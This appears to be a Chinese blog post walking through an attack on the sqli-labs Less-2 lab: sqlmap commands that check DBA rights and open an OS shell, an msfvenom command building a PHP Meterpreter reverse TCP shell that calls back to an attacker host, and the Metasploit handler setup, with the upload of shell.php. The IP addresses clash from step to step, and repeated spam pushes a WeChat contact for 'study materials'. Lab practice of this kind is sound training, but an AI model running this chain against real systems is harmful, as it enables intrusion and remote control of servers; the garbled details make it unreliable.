学习路线:
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
http:192.168.126.130/sqlilabs/sqli-labs-master/Less-2/
① sqlmap注入测试
http://192.168.126.192/sqlilabs/sqli-labs-master/Less-2/?id=1
② --is-dba
在使用 –os-shell 获取操作系统 shell 的时候,要先确定当前用户是否为管理员权限。
sqlmap -u http://192.168.126.192/sqlilabs/sqli-labs-master/Less-2/?id=1 --is-dba
③–os-shell
如果 current user is DBA: Ture 说明可以对靶机目录/文件进行
sqlmap -u http://192.168.126.192/sqlilabs/sqli-labs-master/Less-2/?id=1 --os-shell
④ 反弹 shell
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。
msf 生成反弹 shell 代码,将生成的代码保存在 shell.php 文件中。
这是一个使用msfvenom工具生成一个PHP的Meterpreter反向TCP shell的命令。具体参数的解释如下:
-p php/meterpreter_reverse_tcp:指定生成的payload类型为PHP的Meterpreter反向TCP shell。
lhost=192.168.126.130:指定本地主机的IP地址,也就是反向连接的目标主机的IP地址。
lport=4444:指定本地主机的端口号,也就是反向连接的目标主机的监听端口号。
-o shell.php:指定生成的payload文件的名称为shell.php。
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.126.130 lport=4444 -o shell.php
开启 msf 设置相关参数,然后 exploit,访问 shell.php 就可以反弹 shell。
msfconsole
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 10.10.16.128
exploit
shell
进行文件上传,然后访问文件上传脚本
访问shell.php的路径,然后发现脚本成功
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
3708
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
